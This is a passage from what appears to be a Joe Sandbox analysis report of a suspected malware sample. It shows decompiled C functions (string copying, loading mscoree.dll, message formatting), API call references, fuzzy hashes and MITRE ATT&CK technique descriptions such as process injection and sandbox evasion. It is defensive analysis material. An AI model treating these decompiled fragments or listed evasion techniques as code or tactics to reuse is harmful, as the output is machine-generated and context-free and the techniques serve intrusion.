							__eflags = ( *_t239 >> ( !(_t239[2]) & 0x00000001)) +  *((intOrPtr*)(_t246 - 0x23c)) - 1 - 0x104;
							if(( *_t239 >> ( !(_t239[2]) & 0x00000001)) +  *((intOrPtr*)(_t246 - 0x23c)) - 1 > 0x104) {
								_t237 = 0x80004005;
								goto L23;
							}
							_t240 =  *(_t246 - 0x24c);
							__imp__wcscpy_s( *((intOrPtr*)(_t246 - 0x248)), _t240 + 1, _t246 - 0x20);
							_t241 =  *((intOrPtr*)(_t246 - 0x248)) + _t240 * 2;
							__imp__wcscpy_s(_t241,  *(_t246 - 0x238) + 1, _t246 - 0x22c);
							_t250 = _t248 + 0x18;
							 *((intOrPtr*)(_t246 - 0x230)) = _t241 +  *(_t246 - 0x238) * 2;
							_t242 =  *(_t246 - 0x234);
							__eflags = ( *_t242 >> ( !(_t242[2]) & 0x00000001)) - 1;
							if(__eflags == 0) {
								E0024A95D(_t175, _t242, _t235, _t242);
								_push( *((intOrPtr*)( *((intOrPtr*)(_t246 - 0x240)) + 0x18)));
								_push(_t175 + 1);
								_t153 =  *((intOrPtr*)(_t246 - 0x230)) + ( *_t242 >> ( !(_t242[2]) & 0x00000001)) * 2 + 0xfffffffe;
								__eflags = _t153;
							} else {
								E0024C86D(_t175, _t242, _t235, _t242, __eflags);
								_t243 = _t242[3];
								E0024A95D(_t175,  *(_t246 - 0x234), _t235, _t243);
								_t244 =  *(_t246 - 0x234);
								__imp__wcscpy_s( *((intOrPtr*)(_t246 - 0x230)),  *( *(_t246 - 0x234)) >> ( !(_t244[2]) & 0x00000001), _t243);
								E0024A95D(_t175, _t244, _t235, _t244);
								_t245 = _t175 + 1;
								__imp__wcscpy_s( *((intOrPtr*)(_t246 - 0x230)) - 2 + ( *_t244 >> ( !(( *(_t246 - 0x234))[2]) & 0x00000001)) * 2, _t245, "\\");
								_t250 = _t250 + 0x18;
								E0024A95D(_t175,  *(_t246 - 0x234), _t235, _t245);
								_push( *((intOrPtr*)( *((intOrPtr*)(_t246 - 0x240)) + 0x18)));
								_push(_t245);
								_t153 =  *((intOrPtr*)(_t246 - 0x230)) + ( *( *(_t246 - 0x234)) >> ( !(( *(_t246 - 0x234))[2]) & 0x00000001)) * 2;
							}
							__imp__wcscpy_s(_t153);
							_t248 = _t250 + 0xc;
							_t237 = E0024E7CF( *((intOrPtr*)(_t246 - 0x240)),  *((intOrPtr*)(_t246 - 0x254)),  *((intOrPtr*)(_t246 - 0x248)));
							__eflags = _t237;
							if(_t237 >= 0) {
								goto L26;
							} else {
								goto L23;
							}
						} else {
							goto L15;
						}
						do {
							L15:
							_t238 = _t238 - _t132;
							_t190 =  *_t190;
							_t132 =  *((intOrPtr*)(_t190 + 4));
							__eflags = _t238 - _t132;
						} while (_t238 >= _t132);
						goto L16;
						L23:
						_t235 = _t235 + 1;
						__eflags = _t235 -  *(_t246 - 0x274);
					} while (_t235 <  *(_t246 - 0x274));
					goto L24;
				} else {
					 *(_t246 - 4) =  *(_t246 - 4) | 0xffffffff;
					E0024E299(_t246 - 0x274);
					L27:
					return E0024FAF3(_t175, _t235, _t237);
				}
			}

0x0024e804
0x0024e80e
0x0024e815
0x0024e81b
0x0024e824
0x0024e82d
0x0024e833
0x0024e838
0x0024e83b
0x0024e83e
0x0024e840
0x0024e840
0x0024e843
0x0024e846
0x0024e846
0x0024e84d
0x0024e84f
0x0024e855
0x0024e85a
0x0024e860
0x0024e866
0x0024e870
0x0024e87d
0x0024e880
0x0024e888
0x0024e8a6
0x0024e8ac
0x0024e8b2
0x0024e8b6
0x0024e8ba
0x0024e8c6
0x0024e8cb
0x0024e8d2
0x0024ea15
0x0024ea1c
0x0024ea1e
0x0024ea1e
0x0024e88a
0x0024e893
0x0024e89f
0x0024e89f
0x0024ea29
0x0024ea43
0x0024ea4a
0x0024ea4e
0x0024ea56
0x0024ea5d
0x0024ea6d
0x0024ea72
0x0024ea75
0x0024ea78
0x0024ea78
0x0024ea7b
0x0024ea7e
0x0024ea7e
0x0024ea83
0x0024ea83
0x0024ea85
0x0024ea87
0x0024ea8d
0x0024ea96
0x0024ea9c
0x0024ea9c
0x0024ea9f
0x0024eaa2
0x0024eaa2
0x0024eaad
0x0024eaaf
0x0024eabc
0x0024eac2
0x0024eac9
0x0024ec95
0x0024ec95
0x0024ec97
0x0024ecaf
0x0024ecaf
0x0024ecb1
0x0024ecb1
0x0024ecb1
0x0024ecb1
0x0024ecbb
0x00000000
0x00000000
0x00000000
0x00000000
0x0024eacf
0x0024eacf
0x0024eacf
0x0024ead1
0x0024ead7
0x0024eadd
0x0024eadf
0x0024eaec
0x0024eaec
0x0024eaf0
0x0024eaf8
0x0024eb12
0x0024eb17
0x0024ec83
0x00000000
0x0024ec83
0x0024eb21
0x0024eb31
0x0024eb40
0x0024eb53
0x0024eb59
0x0024eb65
0x0024eb6b
0x0024eb7d
0x0024eb80
0x0024ec30
0x0024ec3d
0x0024ec43
0x0024ec57
0x0024ec57
0x0024eb86
0x0024eb88
0x0024eb8d
0x0024eb96
0x0024eba4
0x0024ebbb
0x0024ebc6
0x0024ebcd
0x0024ebf3
0x0024ebf9
0x0024ec02
0x0024ec15
0x0024ec18
0x0024ec29
0x0024ec29
0x0024ec5b
0x0024ec61
0x0024ec7b
0x0024ec7d
0x0024ec7f
0x00000000
0x0024ec81
0x00000000
0x0024ec81
0x00000000
0x00000000
0x00000000
0x0024eae1
0x0024eae1
0x0024eae1
0x0024eae3
0x0024eae5
0x0024eae8
0x0024eae8
0x00000000
0x0024ec88
0x0024ec88
0x0024ec89
0x0024ec89
0x00000000
0x0024ea2b
0x0024ea2b
0x0024ea35
0x0024ecc2
0x0024ecc7
0x0024ecc7

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 0024E80E

Part of subcall function 0024E1DE: __EH_prolog3.LIBCMT ref: 0024E1E5

wcscpy_s.MSVCR120_CLR0400 ref: 0024EB31
wcscpy_s.MSVCR120_CLR0400 ref: 0024EB53
wcscpy_s.MSVCR120_CLR0400 ref: 0024EBBB

Part of subcall function 0024A95D: __EH_prolog3_GS.LIBCMT ref: 0024C877

wcscpy_s.MSVCR120_CLR0400 ref: 0024EBF3
wcscpy_s.MSVCR120_CLR0400 ref: 0024EC5B

Part of subcall function 0024E7CF: LoadLibraryExW.KERNEL32(?,00000000,00000000,?,0024ECAF,?,?), ref: 0024E7E8

Memory Dump Source

Source File: 00000007.00000002.263709457.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.263704365.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263721368.0000000000252000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263725658.0000000000254000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_orxds.jbxd

Similarity

API ID: wcscpy_s$H_prolog3H_prolog3_H_prolog3_catch_LibraryLoad
String ID:
API String ID: 2790227069-0
Opcode ID: c8f78edc8f311451739ee78459caaf8e67ed0bcea44c068b4dad857aacd9c57a
Instruction ID: 0bc2c51d6e26e89e9593c4f67c4a066df93aae94073de03698a774668db48671
Opcode Fuzzy Hash: c8f78edc8f311451739ee78459caaf8e67ed0bcea44c068b4dad857aacd9c57a
Instruction Fuzzy Hash: 41A1793191052A8BDF28EF28CC99AACB7B5FF48314F0541D9E80EA7251DB35AE95CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00249229 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47
libraryCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00249229(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t11;
				signed short _t12;
				intOrPtr _t17;
				signed int _t20;
				struct HINSTANCE__* _t23;
				intOrPtr* _t27;
				void* _t28;

				_push(8);
				E0024FB02(E0024FE6C, __ebx, __edi, __esi);
				_t27 = __ecx;
				_t11 =  *0x2528d8; // 0x0
				if(_t11 != 0) {
					L9:
					 *_t27 = _t11;
					_t12 = 0;
					L10:
					return E0024FAD0(_t12);
				}
				_t20 = 0;
				_t23 = LoadLibraryExW(L"mscoree.dll", 0, 0);
				if(_t23 != 0) {
					 *((short*)(_t28 - 0x10)) = 0;
					 *(_t28 - 0x14) = _t23;
					 *((char*)(_t28 - 0x10)) = 1;
					 *(_t28 - 4) = 1;
					asm("lock cmpxchg [edi], ecx");
					if(0 == 0) {
						_t17 =  *0x2528d8; // 0x0
						_t20 = 1;
						 *0x252d90 = _t17;
						 *0x252d94 = 1;
						 *((char*)(_t28 - 0xf)) = 1;
					}
					 *(_t28 - 4) =  *(_t28 - 4) | 0xffffffff;
					if(_t20 == 0) {
						FreeLibrary(_t23);
					}
					_t11 =  *0x2528d8; // 0x0
					 *((short*)(_t28 - 0x10)) = 0;
					goto L9;
				}
				_t12 = GetLastError();
				if(_t12 > 0) {
					_t12 = _t12 & 0x0000ffff | 0x80070000;
				}
				goto L10;
			}

0x00249229
0x00249230
0x00249235
0x00249237
0x0024923e
0x002492bc
0x002492bc
0x002492be
0x002492c0
0x002492c5
0x002492c5
0x00249240
0x0024924f
0x00249253
0x00249269
0x0024926d
0x00249270
0x00249274
0x00249284
0x0024928a
0x0024928c
0x00249291
0x00249293
0x00249298
0x0024929f
0x0024929f
0x002492a2
0x002492a8
0x002492ab
0x002492ab
0x002492b1
0x002492b6
0x00000000
0x002492b6
0x00249255
0x0024925d
0x00249262
0x00249262
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 00249230
LoadLibraryExW.KERNEL32(mscoree.dll,00000000,00000000,00000008,002492FA,?,?,002412C8,?,0024936E,0024985C,0000000C,00249425,?,?,0024985C), ref: 00249249
GetLastError.KERNEL32(?,?,002412C8,?,0024936E,0024985C,0000000C,00249425,?,?,0024985C,?,00000000), ref: 00249255
FreeLibrary.KERNEL32(00000000,?,?,002412C8,?,0024936E,0024985C,0000000C,00249425), ref: 002492AB

Strings

mscoree.dll, xrefs: 00249244

Memory Dump Source

Source File: 00000007.00000002.263709457.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.263704365.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263721368.0000000000252000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263725658.0000000000254000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_orxds.jbxd

Similarity

API ID: Library$ErrorFreeH_prolog3LastLoad
String ID: mscoree.dll
API String ID: 1432486926-1912557249
Opcode ID: 6944c7a299a14236fa9d45a089349571bb1eaf31955aa1a1a0a13e9e3982040f
Instruction ID: e3c44ee76671c7456bd7b4d10c1833cb582992cdade4e8fcccd8dd301dc488b7
Opcode Fuzzy Hash: 6944c7a299a14236fa9d45a089349571bb1eaf31955aa1a1a0a13e9e3982040f
Instruction Fuzzy Hash: 7E11A130A20342DAEB08DFB4A94826B76F0FF5531AF108428EC44D73A1E7B18C988765

Uniqueness

Uniqueness Score: -1.00%

Function 002498B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38
libraryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E002498B0(int __ecx, WCHAR* __edx, int _a4) {
				struct HINSTANCE__* _t5;
				void* _t6;
				signed short _t9;
				int _t12;
				WCHAR* _t16;
				struct HINSTANCE__* _t18;

				_t12 = __ecx;
				_t16 = __edx;
				_t9 = __ecx;
				_t5 = LoadStringW(0, __ecx, __edx, _a4);
				if(_t5 == 0) {
					_t5 = LoadLibraryExW(L"mscoree.dll", 0, 0);
					_t18 = _t5;
					_t20 = _t18;
					if(_t18 != 0) {
						_push(_t12);
						_t6 = E00249847(_t9 & 0x0000ffff, _t16, _t20, _a4);
						FreeLibrary(_t18);
						return 0 | _t6 > 0x00000000;
					}
				}
				return _t5;
			}

0x002498b0
0x002498b9
0x002498bb
0x002498c2
0x002498ca
0x002498d3
0x002498d9
0x002498db
0x002498dd
0x002498df
0x002498e8
0x002498f5
0x00000000
0x002498fb
0x002498dd
0x00249901

APIs

LoadStringW.USER32(00000000,0000000C,?,00249A6D), ref: 002498C2
LoadLibraryExW.KERNEL32(mscoree.dll,00000000,00000000,?,00000000,?,00249A6D,00000100,?,00248C4B), ref: 002498D3
FreeLibrary.KERNEL32(00000000,00249A6D,?,?,00000000,?,00249A6D,00000100,?,00248C4B), ref: 002498F5

Strings

mscoree.dll, xrefs: 002498CE

Memory Dump Source

Source File: 00000007.00000002.263709457.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.263704365.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263721368.0000000000252000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263725658.0000000000254000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_orxds.jbxd

Similarity

API ID: LibraryLoad$FreeString
String ID: mscoree.dll
API String ID: 2997845976-1912557249
Opcode ID: 0fb3143fb7c1604ac3c737d084c0d46f0e5da9735d395edfdd567416b77d9f4e
Instruction ID: ac594fb6a6c69a5910b208b04b742a3e14c5ad4915f11cf862bf3d38cb57a42a
Opcode Fuzzy Hash: 0fb3143fb7c1604ac3c737d084c0d46f0e5da9735d395edfdd567416b77d9f4e
Instruction Fuzzy Hash: B5F0EC313013257B13251B9AAC8CD67FE5CDF827B53014035FD09C2110EA30CCA080F0

Uniqueness

Uniqueness Score: -1.00%

Function 0024CDFE Relevance: 6.2, APIs: 4, Instructions: 210
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0024CDFE(void* __ebx, unsigned int* __ecx, void* __edi, void* __esi, void* __eflags) {
				char* _t95;
				intOrPtr _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t103;
				intOrPtr _t105;
				intOrPtr _t107;
				intOrPtr _t109;
				intOrPtr _t111;
				intOrPtr _t113;
				WCHAR** _t118;
				void* _t120;
				signed int _t128;
				intOrPtr _t131;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t134;
				intOrPtr _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				intOrPtr _t138;
				intOrPtr _t139;
				void* _t140;
				signed char _t154;
				intOrPtr* _t157;
				WCHAR* _t168;
				unsigned int _t170;
				signed int _t171;
				unsigned int* _t179;
				intOrPtr _t181;
				void* _t183;
				void* _t184;

				_push(0x54);
				E0024FB35(E002505D6, __ebx, __edi, __esi);
				_t179 = __ecx;
				_t131 =  *((intOrPtr*)(_t184 + 0x18));
				_t181 =  *((intOrPtr*)(_t184 + 0x1c));
				 *((intOrPtr*)(_t184 - 0x5c)) =  *((intOrPtr*)(_t184 + 0x20));
				 *((intOrPtr*)(_t184 - 0x50)) =  *((intOrPtr*)(_t184 + 0x24));
				 *((intOrPtr*)(_t184 - 0x58)) =  *((intOrPtr*)(_t184 + 0x28));
				 *((intOrPtr*)(_t184 - 0x60)) =  *((intOrPtr*)(_t184 + 0x2c));
				 *((intOrPtr*)(_t184 - 0x48)) =  *((intOrPtr*)(_t184 + 0x30));
				 *((intOrPtr*)(_t184 - 0x54)) =  *((intOrPtr*)(_t184 + 0x34));
				 *((intOrPtr*)(_t184 - 0x4c)) =  *((intOrPtr*)(_t184 + 0x38));
				 *((intOrPtr*)(_t184 - 0x3c)) =  *((intOrPtr*)(_t184 + 0x3c));
				if(_t131 != 0) {
					E0024C86D(_t131, _t131, __ecx, _t181, __eflags);
					_t19 = _t131 + 0xc; // 0x3037332e
					_t95 =  *_t19;
				} else {
					_t95 = 0;
				}
				 *(_t184 - 0x38) = _t95;
				if(_t181 != 0) {
					E0024C86D(_t131, _t181, _t179, _t181, __eflags);
					_t97 =  *((intOrPtr*)(_t181 + 0xc));
				} else {
					_t97 = 0;
				}
				 *((intOrPtr*)(_t184 - 0x34)) = _t97;
				_t132 =  *((intOrPtr*)(_t184 - 0x5c));
				if(_t132 != 0) {
					E0024C86D(_t132, _t132, _t179, _t181, __eflags);
					_t99 =  *((intOrPtr*)(_t132 + 0xc));
				} else {
					_t99 = 0;
				}
				 *((intOrPtr*)(_t184 - 0x30)) = _t99;
				_t133 =  *((intOrPtr*)(_t184 - 0x50));
				if(_t133 != 0) {
					E0024C86D(_t133, _t133, _t179, _t181, __eflags);
					_t101 =  *((intOrPtr*)(_t133 + 0xc));
				} else {
					_t101 = 0;
				}
				 *((intOrPtr*)(_t184 - 0x2c)) = _t101;
				_t134 =  *((intOrPtr*)(_t184 - 0x58));
				if(_t134 != 0) {
					E0024C86D(_t134, _t134, _t179, _t181, __eflags);
					_t103 =  *((intOrPtr*)(_t134 + 0xc));
				} else {
					_t103 = 0;
				}
				 *((intOrPtr*)(_t184 - 0x28)) = _t103;
				_t135 =  *((intOrPtr*)(_t184 - 0x60));
				if(_t135 != 0) {
					E0024C86D(_t135, _t135, _t179, _t181, __eflags);
					_t105 =  *((intOrPtr*)(_t135 + 0xc));
				} else {
					_t105 = 0;
				}
				 *((intOrPtr*)(_t184 - 0x24)) = _t105;
				_t136 =  *((intOrPtr*)(_t184 - 0x48));
				if(_t136 != 0) {
					E0024C86D(_t136, _t136, _t179, _t181, __eflags);
					_t107 =  *((intOrPtr*)(_t136 + 0xc));
				} else {
					_t107 = 0;
				}
				 *((intOrPtr*)(_t184 - 0x20)) = _t107;
				_t137 =  *((intOrPtr*)(_t184 - 0x54));
				if(_t137 != 0) {
					E0024C86D(_t137, _t137, _t179, _t181, __eflags);
					_t109 =  *((intOrPtr*)(_t137 + 0xc));
				} else {
					_t109 = 0;
				}
				 *((intOrPtr*)(_t184 - 0x1c)) = _t109;
				_t138 =  *((intOrPtr*)(_t184 - 0x4c));
				if(_t138 != 0) {
					E0024C86D(_t138, _t138, _t179, _t181, __eflags);
					_t111 =  *((intOrPtr*)(_t138 + 0xc));
				} else {
					_t111 = 0;
				}
				 *((intOrPtr*)(_t184 - 0x18)) = _t111;
				_t139 =  *((intOrPtr*)(_t184 - 0x3c));
				if(_t139 != 0) {
					E0024C86D(_t139, _t139, _t179, _t181, __eflags);
					_t113 =  *((intOrPtr*)(_t139 + 0xc));
				} else {
					_t113 = 0;
				}
				 *((intOrPtr*)(_t184 - 0x14)) = _t113;
				_t170 =  *_t179;
				_t183 = 1;
				_t154 =  !(_t179[2]) & 1;
				_t116 = _t170 >> _t154 == 1;
				if(_t170 >> _t154 == 1) {
					_t140 = 0;
					__eflags = 0;
					goto L37;
				} else {
					_t140 = 0;
					E0024D115(_t116, _t179, _t179, 1, (_t170 >> _t154) - 1, 4, 0);
					_t128 = FormatMessageW(0x30ff, 0,  *(_t184 + 0x10), 0x400, _t179[3],  *_t179 >> ( !(_t179[2]) & 1), _t184 - 0x38);
					if(_t128 == 0 || _t128 >= ( *_t179 >> ( !(_t179[2]) & 1)) - 1) {
						L37:
						 *(_t184 - 0x44) = _t140;
						 *(_t184 - 0x40) = _t140;
						 *(_t184 - 4) = 3;
						_push(_t184 - 0x3c);
						_t118 = E0024D1E6(_t140, _t184 - 0x44, _t179, _t183, __eflags);
						 *(_t184 - 4) = 4;
						_t171 = FormatMessageW(0x31ff, _t140,  *(_t184 + 0x10), 0x400,  *_t118, _t140, _t184 - 0x38);
						 *(_t184 - 4) = 3;
						_t157 =  *((intOrPtr*)(_t184 - 0x3c));
						__eflags =  *_t157 - _t140;
						if( *_t157 != _t140) {
							 *(_t157 + 4) = _t183;
						}
						__eflags = _t171;
						if(_t171 != 0) {
							_t120 =  *(_t184 - 0x44);
							__eflags =  *((short*)(_t120 + _t171 * 2 - 2)) - 0x20;
							if( *((short*)(_t120 + _t171 * 2 - 2)) == 0x20) {
								__eflags = 0;
								 *((short*)(_t120 + _t171 * 2 - 2)) = 0;
								_t120 =  *(_t184 - 0x44);
							}
							E0024C6CE(_t179, _t120);
						} else {
							_t183 = _t140;
						}
						 *(_t184 - 4) =  *(_t184 - 4) | 0xffffffff;
						__eflags =  *(_t184 - 0x40);
						if( *(_t184 - 0x40) != 0) {
							LocalFree( *(_t184 - 0x44));
							 *(_t184 - 0x40) = _t140;
						}
						goto L46;
					} else {
						_t168 = _t179[3];
						if( *((short*)(_t168 + _t128 * 2 - 2)) == 0x20) {
							 *((short*)(_t168 + _t128 * 2 - 2)) = 0;
							_t128 = _t128 - 1;
						}
						E0024D115(_t128, _t179, _t179, _t183, _t128, 4, _t183);
						L46:
						return E0024FAE4(_t140, _t179, _t183);
					}
				}
			}

0x0024cdfe
0x0024ce05
0x0024ce0a
0x0024ce0f
0x0024ce12
0x0024ce15
0x0024ce1b
0x0024ce21
0x0024ce27
0x0024ce2d
0x0024ce33
0x0024ce39
0x0024ce3f
0x0024ce44
0x0024ce4c
0x0024ce51
0x0024ce51
0x0024ce46
0x0024ce46
0x0024ce46
0x0024ce54
0x0024ce59
0x0024ce61
0x0024ce66
0x0024ce5b
0x0024ce5b
0x0024ce5b
0x0024ce69
0x0024ce6c
0x0024ce71
0x0024ce79
0x0024ce7e
0x0024ce73
0x0024ce73
0x0024ce73
0x0024ce81
0x0024ce84
0x0024ce89
0x0024ce91
0x0024ce96
0x0024ce8b
0x0024ce8b
0x0024ce8b
0x0024ce99
0x0024ce9c
0x0024cea1
0x0024cea9
0x0024ceae
0x0024cea3
0x0024cea3
0x0024cea3
0x0024ceb1
0x0024ceb4
0x0024ceb9
0x0024cec1
0x0024cec6
0x0024cebb
0x0024cebb
0x0024cebb
0x0024cec9
0x0024cecc
0x0024ced1
0x0024ced9
0x0024cede
0x0024ced3
0x0024ced3
0x0024ced3
0x0024cee1
0x0024cee4
0x0024cee9
0x0024cef1
0x0024cef6
0x0024ceeb
0x0024ceeb
0x0024ceeb
0x0024cef9
0x0024cefc
0x0024cf01
0x0024cf09
0x0024cf0e
0x0024cf03
0x0024cf03
0x0024cf03
0x0024cf11
0x0024cf14
0x0024cf19
0x0024cf21
0x0024cf26
0x0024cf1b
0x0024cf1b
0x0024cf1b
0x0024cf29
0x0024cf2c
0x0024cf33
0x0024cf36
0x0024cf3c
0x0024cf3e
0x0024cfae
0x0024cfae
0x00000000
0x0024cf40
0x0024cf40
0x0024cf4b
0x0024cf71
0x0024cf79
0x0024cfb0
0x0024cfb0
0x0024cfb3
0x0024cfb6
0x0024cfc0
0x0024cfc4
0x0024cfc9
0x0024cfe8
0x0024cfea
0x0024cfee
0x0024cff1
0x0024cff3
0x0024cff5
0x0024cff5
0x0024cff8
0x0024cffa
0x0024d000
0x0024d003
0x0024d009
0x0024d00b
0x0024d00d
0x0024d012
0x0024d012
0x0024d018
0x0024cffc
0x0024cffc
0x0024cffc
0x0024d01d
0x0024d021
0x0024d025
0x0024d02a
0x0024d030
0x0024d030
0x00000000
0x0024cf8b
0x0024cf8b
0x0024cf94
0x0024cf98
0x0024cf9d
0x0024cf9d
0x0024cfa4
0x0024d033
0x0024d03a
0x0024d03a
0x0024cf79

APIs

__EH_prolog3_GS.LIBCMT ref: 0024CE05
FormatMessageW.KERNEL32(000030FF,00000000,00000000,00000400,?,00000000,00000000,?,00000004,00000000,00000054,0024C43A), ref: 0024CF71

Part of subcall function 0024C86D: __EH_prolog3_GS.LIBCMT ref: 0024C877

Part of subcall function 0024D1E6: __EH_prolog3.LIBCMT ref: 0024D1ED
Part of subcall function 0024D1E6: LocalFree.KERNEL32(?,00000004,0024CFC9,00000000,00000054,0024C43A,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0024D205

FormatMessageW.KERNEL32(000031FF,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000054,0024C43A,?,?,?,?,00000000,00000000), ref: 0024CFE2
LocalFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0024D02A

Memory Dump Source

Source File: 00000007.00000002.263709457.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.263704365.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263721368.0000000000252000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.263725658.0000000000254000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_orxds.jbxd

Similarity

API ID: FormatFreeH_prolog3_LocalMessage$H_prolog3
String ID:
API String ID: 3485839094-0
Opcode ID: 4516d102146c8607823e51e57386ca6fa55704d7ffa6f753575b04408c408cdf
Instruction ID: be9e3465d18590e71b0f6584108d31a82ebf2d494be0e297b39b5085c16c19c6
Opcode Fuzzy Hash: 4516d102146c8607823e51e57386ca6fa55704d7ffa6f753575b04408c408cdf
Instruction Fuzzy Hash: C6814070B212059FCB99DFA9C8C1AAEB7B5FF48714F20842AE916DB341DB709D25CB50

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

